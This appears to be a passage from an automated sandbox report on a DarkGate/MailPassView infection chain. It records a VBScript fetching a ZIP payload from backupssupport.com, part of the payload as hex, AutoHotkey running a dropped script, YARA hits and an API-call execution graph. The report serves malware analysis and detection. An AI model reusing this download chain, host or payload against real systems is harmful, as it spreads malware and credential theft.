                                    Apr 17, 2024 06:39:56.527079105 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.527086973 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.527090073 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.527113914 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.527133942 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.527192116 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.679419041 CEST8049730205.234.201.153192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 17, 2024 06:39:54.504625082 CEST6450253192.168.2.41.1.1.1
                                    Apr 17, 2024 06:39:54.823066950 CEST53645021.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Apr 17, 2024 06:39:54.504625082 CEST192.168.2.41.1.1.10x543eStandard query (0)backupssupport.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Apr 17, 2024 06:39:54.823066950 CEST1.1.1.1192.168.2.40x543eNo error (0)backupssupport.com205.234.201.153A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • backupssupport.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730205.234.201.153806640C:\Windows\System32\wscript.exe
                                    TimestampBytes transferredDirectionData
                                    Apr 17, 2024 06:39:54.987380981 CEST330OUTGET /fykbmgsz HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-ch
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: backupssupport.com
                                    Connection: Keep-Alive
                                    Apr 17, 2024 06:39:55.488548994 CEST1289INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Disposition: attachment; filename="fykbmgsz"
                                    Content-Type: application/octet-stream
                                    Content-Length: 795674
                                    Date: Wed, 17 Apr 2024 04:39:55 GMT
                                    Data Raw: 50 4b 03 04 14 00 00 00 08 00 47 2f 90 58 5b 96 81 81 59 ef 04 00 62 8a 0e 00 08 00 00 00 74 65 73 74 2e 74 78 74 ec dd 57 82 dc 38 d2 36 ea 2d a5 37 97 69 f7 bf a4 ff 79 03 00 93 64 55 69 ba 5b fa 6e ce 11 67 5a 95 34 70 81 f0 08 04 ae 9b d7 f5 7e dd ec 37 75 1d f7 e7 c3 e9 75 3a 9c 77 87 ed e9 78 dc 9d 4e 87 cb e9 76 da 9d cf c7 eb e9 7c 7a 1d de a7 f7 f9 7a da 1f ee 87 dd f1 76 dc 1d ee be d9 1f 5d e7 db e9 78 be 1c 6e 7e 1e 0e c7 e3 e6 b0 3b 9c cf a7 f3 e5 f4 3e 5d 0e 8f f3 e1 f0 38 6e fd 7e 9d 77 c7 fd e9 7a be 1d 8e e7 cd 69 ef 8b 83 ef b6 fe d9 1e 8f a7 f3 f9 a6 d6 f3 49 0b 6a 79 7b 73 3b f8 52 5d 97 f3 f9 f0 54 ff eb bc 3f ec ce 1b ff 1e 4e 5b ad 9c 8f 97 e3 e9 f0 f6 46 dd a7 e7 e9 a8 c7 c7 d3 d6 3f bb e3 f6 7c 3d e6 7f db 73 be b8 2a 77 3e 6f 34 b2 d5 c6 e1 f0 3a ec 4e 8f d3 f1 b0 37 c2 a7 2f d3 a3 83 5f 19 d5 f6 b0 3f 3d b5 fc 36 a6 ab 77 e7 c3 f9 74 3b fa ce 38 33 d8 8b 3a ae fa e2 d6 7f 5e d6 97 27 6d 5c b5 bf 3b 5d 3d d3 83 f3 4e 6d 5b ed ee 4e 97 7c 0f 76 e0 73 78 6a 0b fc f4 f6 0d 26 7a a3 0f cf d3 e3 bc 37 f2 fd e1 71 7a 1f 4e a7 8b 96 b7 81 b6 fe 6e d4 7b 3c bd 34 b6 3f de 40 ed 7e 3a 1c ee 46 6b 16 8e 1b d0 bd 83 77 5a 3d 98 99 9d 91 f9 e1 e9 13 fc 2e 6a 07 22 b3 ba 35 19 ef c3 2d 6d 1a cc e6 f0 30 49 fb b3 06 f5 e0 60 66 77 a7 bb 9a 5f 7a 0e aa a7 cb 79 7f ba 99 9b bd 12 67 90 ba 64 56 40 52 1b d5 eb 93 39 7c 7b 72 3b 5c cf 7b 50 3d e8 6d 00 b3 3d 99 f5 63 5a d9 a9 65 7b 7a 80 d1 01 1c 55 a2 d7 b0 c2 28 dd 9b 85 73 da cd ec e8 d9 cd bb 07 18 1a 51 f5 e5 76 3a a9 67 0b ca d7 93 59 53 ea 06 03 9e c7 3d 58 04 1f 1f a0 70 32 73 77 f0 79 18 b7 59 02 6b 68 62 5c cf 63 46 73 04 ed 07 bc bd 9b b1 dd c9 d8 33 02 35 de c0 34 3d ba 1e f6 66 62 a3 67 70 1d b6 99 e3 60 a0 d9 3f fb ef 62 16 6f e6 ec ae ce bd d1 6b d4 17 17 6d 2a ea a9 1f ea 85 15 c1 06 94 f2 76 77 86 4b fa 95 b9 86 ab f0 c0 f8 bc 07 89 bd 12 57 7d cd dc 1c f5 ca 1d 38 1f 03 25 75 9a d8 d3 3d 7d 05 37 d0 33 96 bd 71 6f 8c e1 72 b8 a0 41 14 a5 b7 3e 52 5b cd d1 11 36 a4 9f 07 a3 82 5f 27 33 a9 ee 33 04 f0 df 43 af 6e 85 05 70 d7 9c 9d 82 6b 6a f3 ce ac 67 8a 36 46 7c d5 ca 3b 33 a4 b4 17 7a fd ce dc 86 32 43 51 60 fe 38 83 6e e6 52 cd d7 70 80 cc a6 de 18 97 f7 f7 c3 bd f8 c3 53 79 50 28 2a ce 9c 43 cb 20 94 3a 02 af e0 b0 ba 35 7c 41 51 ef 43 e8 f9 84 83 dc 71 12 f8 a2 b6 bb 96 15 68 b3 ab 5e a3 3a df 42 05 30 69 03 33 e0 77 b8 0d 6a 3c 99 cf 8b 52 af d4 8f 56 3c 29 1e 84 9a 60 56 6a 7e 80 85 fe ab f5 04 ef 40 0c ec ef 50 01 a6 64 9e b5 b5 87 75 a1 42 68 17 2c 30 b2 d0 0a 8a 0a f4 c0 1a ef f0 dd de 2c bc 60 4c 66 d8 4c 64 ca 81 2d df 81 b7 6f 2f b0 0c a0 e1 fb 49 79 9c 06 3e 6d 8a 77 e9 ab 59 0b be bc c1 2b 13 bb 33 af 46 a9 c5 5b 28 0b a6 ee 7c a1 f6 1a 5f 28 46 33 b0 cd 07 fe 87 bf 99 11 dc cc 13 d8 a9 e4 0e dc 0e fe 85 73 6a 3d e8 a1 5a 8f ba e9 ab 83 36 f0 9a f0 02 fc 29 bc 18 5a 82 d7 05 be ed 60 be 9e d7 88 f6 da 83 9b 19 2f fa 7f 78 7a 57 ba 70 57 3d fb f0 59 3c 39 7c 2b b8 07 8f 7d 73 f0 7d c6 6a 88 b8 20 0e a9 9d 03 9e 60 b6 f1 d1 1d 28 e2 44 85 9f 7a a3 ac 69 06 5b 7c 20 58 0c 07 95 05 b5 2d cc cc 9c 18 3d bc d7 b6 f1 9b 6f b3 1c 26 9d 52 86 a4 74 fa 0d 86 aa 8a 34 b9 04 35 cc 52 fa 90 39 d9 a1 91 48 8a 8c 55 35 c1 05 35 81 74 30 14 2c 50 00 4c 31 03 99 55 18 a3 ff 5a 34 06 bf 8f b8 2e 7e 01 2b 8e 19 9f 7f 61 93 d6 f4 17 a4 60 04 b8 86 9b 84 72 2e
                                    Data Ascii: PKG/X[Ybtest.txtW86-7iydUi[ngZ4p~7uu:wxNv|zzv]xn~;>]8n~wziIjy{s;R]T?N[F?|=s*w>o4:N7/_?=6wt;83:^'m\;]=Nm[N|vsxj&z7qzNn{<4?@~:FkwZ=.j"5-m0I`fw_zygdV@R9|{r;\{P=m=cZe{zU(sQv:gYS=Xp2swyYkhb\cFs354=fbgp`?bokm*vwKW}8%u=}73qorA>R[6_'33Cnpkjg6F|;3z2CQ`8nRpSyP(*C :5|AQCqh^:B0i3wj<RV<)`Vj~@PduBh,0,`LfLd-o/Iy>mwY+3F[(|_(F3sj=Z6)Z`/xzWpW=Y<9|+}s}j `(Dzi[| X-=o&Rt45R9HU55t0,PL1UZ4.~+a`r.
                                    Apr 17, 2024 06:39:55.488569975 CEST1289INData Raw: a0 6e 32 60 71 30 da fc 1b 19 0e e4 e3 a7 16 d1 92 fe a0 5b 6d 44 ba 91 79 b9 07 77 d8 ed 1b 4f 7c fb f6 96 64 d0 87 bb ae c2 3f fd c6 03 b5 19 88 80 ba 86 83 9d 3b 9c 86 44 80 ab b7 eb 52 fa de c8 3b cd a9 59 f3 6a db 56 3b 27 1c 21 32 34 14 0b
                                    Data Ascii: n2`q0[mDywO|d?;DR;YjV;'!24_U2dATy6p8rg@WTf+{@8mzzod~I*>Q?)U6o'BA$ B6,g2udnj`G*/=%_!l 3p6T({8> Y
                                    Apr 17, 2024 06:39:55.488579988 CEST1289INData Raw: 1f a4 8b 81 59 66 29 76 2b 7b 0f 1d b0 0b c3 69 42 b1 6a f1 02 37 8b ec 0a 7f 87 a9 7e 41 33 bd 7d a3 54 dd 0c 45 a7 bd ea 7d 3a fb 30 ab 9a 04 87 48 12 78 1c 8b 55 1b f1 9a dc 70 11 d3 a3 df b1 0a d1 2c 78 78 42 f2 b3 01 8a 50 69 a4 70 20 9a 59
                                    Data Ascii: Yf)v+{iBj7~A3}TE}:0HxUp,xxBPip YhH2mOGcej*3d87G3p3EDX]4HpQUJl;_nc?N?rtW8uC^q`;))T9
                                    Apr 17, 2024 06:39:55.488586903 CEST1289INData Raw: fe 3e fa d3 2a fa d7 ff 4e e5 ab f1 4f f1 f7 63 7f a9 47 97 fd b5 fe 3e da df ed a6 df 1f da df c3 45 58 8d 62 42 22 eb ef 6d d3 fe 0a 53 48 54 8a a8 33 f0 d1 df c7 18 9f 30 87 e5 9b a9 07 9f c6 55 97 58 a9 44 3f 28 6d a1 6c b3 c9 d2 7c f5 e3 bd
                                    Data Ascii: >*NOcG>EXbB"mSHT30UXD?(ml|Il<(e2O~\>Vu[t=C`*ffae9.gmz}k|R0Kmj?=p;y^uG8i]zmVhoJ\;'u~/qq/e~_
                                    Apr 17, 2024 06:39:55.488603115 CEST1289INData Raw: a3 73 da a1 d5 a7 76 78 b2 1d 58 37 c9 30 c3 1a e3 24 02 12 4a ff e8 70 3d 77 b9 14 fa a7 ce 6b 2f 94 17 7e 19 ce 99 df e8 74 3c 4b ba 89 f0 f0 ed e5 43 45 20 d1 e9 e8 33 1f b0 b0 49 13 7b 66 ab b6 67 93 7d 17 bb 5d 52 23 3c 85 d5 78 f8 f6 65 4a
                                    Data Ascii: svxX70$Jp=wk/~t<KCE 3I{fg}]R#<xeJpWPIc#_)8dR`bfGSg2(Q_K*J}j%}1iy[h/Nu|5%|3G\7'7 <|}
                                    Apr 17, 2024 06:39:55.488614082 CEST1289INData Raw: 6d 80 69 b1 92 e2 85 e2 63 b1 9f 3d d0 b3 43 33 fb e8 d8 74 79 b2 e5 33 c9 37 db c8 e6 ed fd 36 6a d8 7b 0a 1b df 0b cb ad 6f f0 0a 1e e0 af d1 03 b3 83 7b f0 57 cb 30 fa 71 b3 47 98 8f e8 f2 b4 6b 72 ab ce c0 67 ff b6 97 f7 fc d8 c6 0a 35 4e 75
                                    Data Ascii: mic=C3ty376j{o{W0qGkrg5Nuf?$)D{mkk4_kvhjW|9Y$zj)i5<o66_zIBxGixFM]h#9j1yYZlH#\j#}>K`;_<
                                    Apr 17, 2024 06:39:55.488626957 CEST1289INData Raw: 8d 87 7f 0c 4e f0 cb 72 30 d5 35 c7 47 f8 fe be 8d e7 70 ef 3b 4a 36 53 33 f9 3d 49 fa d8 d2 b1 64 23 9f a3 ab 0d bd 32 de 8b 74 54 64 84 15 3d f3 5c ff ee 79 6f cd 4f de 0d 4a f2 1b be e7 5f b8 5c 76 76 68 e3 d3 56 e3 2e 4d 53 20 a7 42 77 b3 7e
                                    Data Ascii: Nr05Gp;J6S3=Id#2tTd=\yoOJ_\vvhV.MS Bw~Xf*OZU%|9w(myf|0m,_g:&nGI#KTW?~y8auV)IGs`|T&8~/:
                                    Apr 17, 2024 06:39:55.488640070 CEST1289INData Raw: 27 01 08 f3 95 f4 41 39 81 ce 78 23 84 d6 a6 82 8d c5 85 1a 98 ba 2e 77 b4 1a d2 74 e9 05 c5 e9 4d d7 95 9c bb 59 b5 f1 dc dc ae 5c 49 ad 0f 85 43 15 cb 9d 48 a4 5b 59 03 ef e1 11 a3 47 a0 ae f8 32 ca 1f cb 01 53 38 1e 2c af 6c d3 60 a8 9b 26 52
                                    Data Ascii: 'A9x#.wtMY\ICH[YG2S8,l`&Rj"D\ngIZilQu/QpXGj!u{{;}}l=E'8roaCj|8e<@q|x29d39~61+kQg/~x5
                                    Apr 17, 2024 06:39:55.488651037 CEST1289INData Raw: 54 23 64 8b d6 d3 8c b0 38 5a c3 b4 e3 eb 1f 8f b1 af bf d7 1c 07 8f 9e d1 be 8c 11 4b 46 4f 7e 07 07 87 3e b5 b9 c2 3f 3b d6 12 a3 d2 35 b0 2c 7d 15 9e c0 0b eb 67 d7 89 2f d2 81 cc 42 70 ec 32 7b 6a d9 c8 7d 96 73 06 9f 19 1a 2c e9 5e 1c 96 b3
                                    Data Ascii: T#d8ZKFO~>?;5,}g/Bp2{j}s,^L6u3 $J3$Cr"~s I,`9/Ku?Rh$YdpE60wk}^LV},;/7&c"?l9;pYs_}ivY#_}
                                    Apr 17, 2024 06:39:55.488662004 CEST272INData Raw: d2 94 ab 07 2c 6e a4 19 00 54 ed 8b e8 05 80 5b 7d 8b b7 77 8d 9f 17 12 12 a7 2d 38 c3 0e ca 7e 84 36 c2 d8 41 d9 ab 15 7b 29 5e 7f 7f 49 c4 18 50 98 a7 0c 4e d9 93 d2 61 d1 e3 1a 78 2a 73 8e 0f 52 24 18 13 c4 72 84 a8 c2 ed b0 1a 76 6d ce bf ca
                                    Data Ascii: ,nT[}w-8~6A{)^IPNax*sR$rvm&(9?j<S&w+/*:+6OYp'g73;x2hn;<eO(qzN&=l'b6<G{/K'<?X
                                    Apr 17, 2024 06:39:55.641962051 CEST1289INData Raw: 1c 1b 70 f8 37 e9 11 3c eb 0e 71 44 dd b6 91 f2 ab c3 57 da 7d ec 79 ec 88 6e 8f d3 4f 9a 7d f4 f4 8b 55 8a 7c 4b e9 ab 55 0e b1 9a a1 fe 7b 60 59 9e 4e 96 ce 16 27 7c 09 84 73 74 9c fd 52 e5 b5 c4 8a 48 70 ef 28 8c dd 7e 86 18 fc 79 d9 7d 47 c0
                                    Data Ascii: p7<qDW}ynO}U|KU{`YN'|stRHp(~y}Gs$e8|m|l"bfVavJ?fUH<aweE,7U^ifORQS5_8&;jMA//IKb,,WK>


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:06:39:53
                                    Start date:17/04/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
                                    Imagebase:0x7ff68fd10000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:06:39:56
                                    Start date:17/04/2024
                                    Path:C:\NwiQ\AutoHotkey.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
                                    Imagebase:0x400000
                                    File size:913'920 bytes
                                    MD5 hash:A59A2D3E5DDA7ACA6EC879263AA42FD3
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 4%, ReversingLabs
                                    • Detection: 1%, Virustotal, Browse
                                    Reputation:moderate
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:1.8%
                                      Dynamic/Decrypted Code Coverage:58.5%
                                      Signature Coverage:6.1%
                                      Total number of Nodes:1827
                                      Total number of Limit Nodes:45
                                      execution_graph 103744 404300 103758 404250 SetErrorMode 103744->103758 103746 404316 103763 404370 FindResourceW 103746->103763 103748 404320 103751 404339 103748->103751 103789 41ef50 103748->103789 103750 404330 103750->103751 103826 4046c0 103750->103826 103753 404346 103753->103751 103839 404820 103753->103839 103755 404354 103755->103751 103851 4048d0 103755->103851 103757 40435d 103870 44b8f0 103758->103870 103760 404263 103762 40429c 103760->103762 103879 47cfc0 52 API calls 103760->103879 103762->103746 103788 404395 _wcsrchr 103763->103788 103764 4045f8 103899 404af0 87 API calls __swprintf 103764->103899 103766 499c29 58 API calls __wcsicoll 103766->103788 103767 404615 103768 4044fb 103767->103768 103900 42d170 58 API calls 2 library calls 103767->103900 103768->103748 103770 404640 103771 40466e 103770->103771 103901 42d420 87 API calls 5 library calls 103770->103901 103771->103768 103902 478ec0 52 API calls __crtGetStringTypeA_stat 103771->103902 103774 40468f 103774->103768 103775 40469a 103774->103775 103903 483650 46 API calls _free 103775->103903 103777 4046a3 103904 41dd30 137 API calls 2 library calls 103777->103904 103779 4046b4 103779->103748 103783 49a3aa 58 API calls __wcsnicmp 103783->103788 103786 404c60 52 API calls 103786->103788 103787 47d380 54 API calls 103787->103788 103788->103764 103788->103766 103788->103768 103788->103783 103788->103786 103788->103787 103884 41d360 58 API calls 2 library calls 103788->103884 103885 49a782 103788->103885 103896 404140 GetCPInfo 103788->103896 103897 47da40 48 API calls 103788->103897 103898 404070 57 API calls __wcstoi64 103788->103898 103790 41ef60 __write_nolock 103789->103790 103791 41efc6 103790->103791 103792 41ef89 GetFileAttributesW 103790->103792 103794 41efd3 103791->103794 103929 47d030 103791->103929 103792->103791 103793 41ef95 103792->103793 103928 47ffb0 79 API calls _vswprintf_s 103793->103928 103797 47d030 52 API calls 103794->103797 103798 41efed 103794->103798 103797->103798 103799 41f26f 103798->103799 103934 41f410 138 API calls 3 library calls 103798->103934 103799->103750 103800 41efa9 103800->103750 103802 41f063 103803 41f07a 103802->103803 103935 41f800 138 API calls 12 library calls 103802->103935 103803->103799 103936 4260f0 88 API calls 3 library calls 103803->103936 103806 41f0a8 103806->103799 103937 42db20 150 API calls 103806->103937 103808 41f0c3 103808->103799 103814 41f146 103808->103814 103815 43ac10 81 API calls 103808->103815 103809 41f159 103809->103799 103810 41f186 103809->103810 103939 43acb0 58 API calls 103809->103939 103810->103800 103813 41f193 SetCurrentDirectoryW 103810->103813 103940 4260f0 88 API calls 3 library calls 103813->103940 103814->103809 103938 42b1f0 82 API calls 103814->103938 103815->103808 103817 41f1b8 103817->103799 103941 4260f0 88 API calls 3 library calls 103817->103941 103819 41f1d2 103819->103799 103942 42e0b0 81 API calls 2 library calls 103819->103942 103821 41f222 103821->103799 103943 42d110 87 API calls 103821->103943 103823 41f239 103823->103799 103824 41f252 GetSystemTimeAsFileTime 103823->103824 103825 41f266 103824->103825 103825->103750 103828 4046d4 103826->103828 103827 404788 103829 404791 FindWindowW 103827->103829 103830 404807 103827->103830 103828->103827 103828->103829 103828->103830 103831 40472e FindWindowW 103828->103831 103829->103830 103836 404742 103829->103836 103830->103753 103831->103827 103831->103836 103832 4047a9 PostMessageW Sleep IsWindow 103834 404803 Sleep 103832->103834 103837 4047ce 103832->103837 103833 40474c 103833->103753 103834->103830 103835 4047f7 Sleep IsWindow 103835->103834 103835->103837 103836->103832 103836->103833 103837->103835 103838 404812 103837->103838 103838->103753 103944 41e0d0 103839->103944 103841 40482e 103842 404832 103841->103842 103843 404837 SystemParametersInfoW 103841->103843 103842->103755 103844 404851 103843->103844 103846 404867 103843->103846 103845 40485a SystemParametersInfoW 103844->103845 103844->103846 103845->103846 103847 40487d _memset 103846->103847 103848 49a0ee _malloc 46 API calls 103846->103848 103849 4048b9 103847->103849 103850 40489e InitCommonControlsEx 103847->103850 103848->103847 103849->103755 103850->103849 103852 404a00 103851->103852 103856 404907 103851->103856 104020 40f6c0 84 API calls 3 library calls 103852->104020 103854 404a05 104000 41e6c0 103854->104000 103856->103852 103857 40492b 103856->103857 104015 408a81 141 API calls 2 library calls 103857->104015 103859 404a56 103859->103757 103860 404a11 103860->103859 104021 41eb40 121 API calls _wcsncpy 103860->104021 103862 4049bb 103862->103852 103863 4049e9 103862->103863 104018 40e4f0 60 API calls 103862->104018 104019 406215 125 API calls _memmove 103863->104019 103864 404937 103864->103852 103864->103862 104016 409044 87 API calls 3 library calls 103864->104016 103868 4049ae 104017 4089df 121 API calls 2 library calls 103868->104017 103880 4a7dd0 103870->103880 103873 44b911 103882 45bd20 52 API calls 2 library calls 103873->103882 103874 44b929 103876 44b939 103874->103876 103883 45bd20 52 API calls 2 library calls 103874->103883 103876->103760 103877 44b921 103877->103760 103879->103762 103881 44b8fa GetCurrentDirectoryW 103880->103881 103881->103873 103881->103874 103882->103877 103883->103876 103884->103788 103888 49a78c _malloc 103885->103888 103887 49a7a6 103887->103788 103888->103887 103891 49a7a8 std::exception::exception 103888->103891 103905 49a0ee 103888->103905 103889 49a7e6 103920 49f3fe 46 API calls std::exception::operator= 103889->103920 103891->103889 103919 49b6b3 51 API calls __cinit 103891->103919 103892 49a7f0 103921 49f47a RaiseException 103892->103921 103895 49a801 103896->103788 103897->103788 103898->103788 103899->103767 103900->103770 103901->103771 103902->103774 103903->103777 103904->103779 103906 49a16b _malloc 103905->103906 103912 49a0fc _malloc 103905->103912 103927 49e4a2 46 API calls __getptd_noexit 103906->103927 103909 49a12a RtlAllocateHeap 103910 49a163 103909->103910 103909->103912 103910->103888 103912->103909 103913 49a157 103912->103913 103914 49a107 103912->103914 103917 49a155 103912->103917 103925 49e4a2 46 API calls __getptd_noexit 103913->103925 103914->103912 103922 49e8e9 46 API calls __NMSG_WRITE 103914->103922 103923 49e73a 46 API calls 6 library calls 103914->103923 103924 49a473 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 103914->103924 103926 49e4a2 46 API calls __getptd_noexit 103917->103926 103919->103889 103920->103892 103921->103895 103922->103914 103923->103914 103925->103917 103926->103910 103927->103910 103928->103800 103930 49a782 52 API calls 103929->103930 103931 47d038 103930->103931 103932 49a0ee _malloc 46 API calls 103931->103932 103933 47d052 moneypunct 103931->103933 103932->103933 103933->103794 103934->103802 103935->103803 103936->103806 103937->103808 103938->103809 103939->103810 103940->103817 103941->103819 103942->103821 103943->103823 103945 41e0ef _memset 103944->103945 103951 41e1a8 103944->103951 103945->103951 103975 481ec0 103945->103975 103947 41e13e GetSystemMetrics 103948 481ec0 14 API calls 103947->103948 103949 41e15f LoadCursorW RegisterClassExW 103948->103949 103950 41e1d5 RegisterClassExW 103949->103950 103949->103951 103950->103951 103952 41e1f1 GetForegroundWindow 103950->103952 103951->103841 103953 41e1fb GetClassNameW 103952->103953 103960 41e21c CreateWindowExW 103952->103960 103955 41e20d 103953->103955 103953->103960 103996 499c29 58 API calls 2 library calls 103955->103996 103956 41e294 103958 41e2d3 CreateWindowExW 103956->103958 103959 41e29d GetMenu EnableMenuItem 103956->103959 103958->103951 103963 41e304 GetDC 103958->103963 103961 41e2c7 103959->103961 103962 41e2bd 103959->103962 103960->103951 103960->103956 103961->103958 103997 41e4e0 EnableMenuItem EnableMenuItem EnableMenuItem EnableMenuItem 103962->103997 103965 41e320 8 API calls 103963->103965 103966 41e31b 103963->103966 103967 41e3b3 ShowWindow SetWindowLongW 103965->103967 103968 41e3ce LoadAcceleratorsW 103965->103968 103966->103965 103967->103968 103969 41e3fa 103968->103969 103970 41e3ee 103968->103970 103998 41e510 Shell_NotifyIconW _memset _wcsncpy 103969->103998 103972 41e413 103970->103972 103973 41e40a 103970->103973 103972->103841 103999 41e430 PostMessageW SetClipboardViewer ChangeClipboardChain 103973->103999 103976 481ed5 LoadLibraryExW 103975->103976 103979 481ee3 103975->103979 103976->103979 103977 482044 103980 48205b ExtractIconW 103977->103980 103981 482070 ExtractIconW 103977->103981 103989 48208d 103977->103989 103978 481efb 103983 481f3b FindResourceW 103978->103983 103984 48202c 103978->103984 103979->103977 103979->103978 103982 481f09 EnumResourceNamesW 103979->103982 103980->103947 103981->103947 103982->103978 103983->103984 103985 481f4d LoadResource 103983->103985 103984->103977 103986 48204c FreeLibrary 103984->103986 103985->103984 103987 481f5d LockResource 103985->103987 103986->103977 103987->103984 103988 481f6e 103987->103988 103990 481f84 GetSystemMetrics 103988->103990 103991 481f90 103988->103991 103989->103947 103990->103991 103991->103984 103992 481fde FindResourceW 103991->103992 103992->103984 103993 481ff2 LoadResource 103992->103993 103993->103984 103994 481ffe LockResource 103993->103994 103994->103984 103995 48200b SizeofResource CreateIconFromResourceEx 103994->103995 103995->103984 103996->103960 103997->103961 103998->103970 103999->103972 104001 49a0ee _malloc 46 API calls 104000->104001 104002 41e6d8 104001->104002 104003 41e6e4 104002->104003 104004 41e6e9 SetTimer 104002->104004 104003->103860 104005 41e72b GetTickCount 104004->104005 104009 41e721 104004->104009 104006 41e77b GetTickCount 104005->104006 104007 41e75f SetTimer 104005->104007 104008 41e7a6 104006->104008 104012 41e7ab 104006->104012 104007->104006 104022 40563f 49 API calls __realloc_crt 104008->104022 104013 41e87b moneypunct 104009->104013 104023 49a18d 104009->104023 104012->104009 104014 41e823 KillTimer 104012->104014 104013->103860 104014->104009 104015->103864 104016->103868 104017->103862 104018->103863 104030 40e820 8 API calls 104018->104030 104019->103852 104020->103854 104021->103859 104022->104012 104024 49a198 RtlFreeHeap 104023->104024 104025 49a1c1 __dosmaperr 104023->104025 104024->104025 104026 49a1ad 104024->104026 104025->104013 104029 49e4a2 46 API calls __getptd_noexit 104026->104029 104028 49a1b3 GetLastError 104028->104025 104029->104028 104031 434e42 104032 434eac 104031->104032 104033 434e4a 104031->104033 104057 41afd0 104032->104057 104035 434e79 104033->104035 104080 47ffb0 79 API calls _vswprintf_s 104033->104080 104036 47ce20 13 API calls 104035->104036 104036->104032 104038 434ef5 104063 47ce20 104038->104063 104039 434ecb 104039->104038 104081 499c29 58 API calls 2 library calls 104039->104081 104042 434f1d 104043 434f32 RegCloseKey 104042->104043 104045 430a54 104042->104045 104043->104045 104044 430a8e GetTickCount 104044->104045 104048 430aaa PeekMessageW 104044->104048 104045->104044 104046 430a66 GlobalUnlock 104045->104046 104047 430a7c CloseClipboard 104045->104047 104052 430b87 GetTickCount 104045->104052 104055 44df90 58 API calls 104045->104055 104056 430d54 104045->104056 104079 406023 129 API calls 2 library calls 104045->104079 104046->104047 104047->104044 104049 430ad0 GetTickCount 104048->104049 104050 430ac4 104048->104050 104049->104045 104051 430acd 104050->104051 104051->104049 104052->104045 104053 430bb6 104052->104053 104053->104045 104055->104045 104058 41afed 104057->104058 104059 499c29 58 API calls __wcsicoll 104058->104059 104060 41b116 _wcsncpy 104058->104060 104061 41b0a0 104058->104061 104059->104058 104060->104061 104062 41b14c RegConnectRegistryW 104060->104062 104061->104039 104062->104039 104064 47ce31 104063->104064 104068 47cf12 104063->104068 104065 47ce43 RegOpenKeyExW 104064->104065 104064->104068 104066 47cee4 104065->104066 104067 47ce6b 104065->104067 104066->104068 104069 47cee9 GetLastError 104066->104069 104070 47ce77 104067->104070 104071 47cefb RegDeleteValueW RegCloseKey 104067->104071 104068->104042 104069->104068 104082 47cd30 RegEnumKeyExW RegOpenKeyExW RegCloseKey RegDeleteKeyW RegEnumKeyExW 104070->104082 104071->104066 104073 47ce7d RegCloseKey 104073->104066 104074 47ce91 104073->104074 104075 47cec2 104074->104075 104076 47ce9e GetModuleHandleW GetProcAddress 104074->104076 104077 47cef1 RegDeleteKeyW 104075->104077 104078 47cedb 104075->104078 104076->104075 104077->104078 104078->104066 104079->104045 104080->104035 104081->104038 104082->104073 104083 4840b46 104086 48b3b3d 104083->104086 104094 48b3d53 104086->104094 104088 4840b52 104089 48b3b4c 104089->104088 104097 489eb61 104089->104097 104314 4844c09 104089->104314 104318 4876655 GetModuleHandleA 104089->104318 104321 4874fc1 104089->104321 104328 48b3eea GetPEB 104094->104328 104096 48b3d5f 104096->104089 104098 489eb69 104097->104098 104098->104098 104330 4847301 GetModuleHandleA 104098->104330 104103 4876655 2 API calls 104104 489ebbd 104103->104104 104340 4872111 104104->104340 104109 489ebec 104111 4874fc1 13 API calls 104109->104111 104113 489ebf4 104111->104113 104429 4875195 104113->104429 104118 489ec0e 104119 4875a5d 12 API calls 104118->104119 104120 489ec16 104119->104120 104121 489ec8a 104120->104121 104122 489ec1a 104120->104122 104455 4875e39 104121->104455 104123 4874fc1 13 API calls 104122->104123 104125 489ec22 104123->104125 104126 4875195 11 API calls 104125->104126 104128 489ec33 104126->104128 104127 489ecb8 Sleep 104461 485bcd1 104127->104461 104131 484520d 11 API calls 104128->104131 104134 489ec3c 104131->104134 